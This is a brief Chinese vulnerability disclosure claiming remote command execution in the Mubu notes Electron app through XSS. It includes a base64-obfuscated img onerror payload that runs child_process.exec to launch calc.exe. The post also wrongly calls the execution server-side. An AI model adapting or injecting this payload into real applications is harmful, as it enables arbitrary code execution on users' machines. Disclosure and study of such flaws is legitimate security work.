幕布笔记存在远程命令执行漏洞
漏洞概述:
Electron
是一个开源的跨平台框架,用于构建基于Web
技术(HTML
、CSS
和JavaScript
)的桌面应用程序。它由 GitHub
公司开发并维护,目前具有 108k star
由于 Electron
内置了 Chromium
内核,并且拥有直接执行Nodejs
代码的能力,攻击者可借助 XSS
漏洞在服务器端远程执行任意代码
当应用程序使用 Electron
框架时,通过接收攻击者精心构造的 Payload
后可能会产生命令执行漏洞。
漏洞详情:
<img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewphbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsgCn0pOw==`,`base64`).toString())'>
阅读 10万+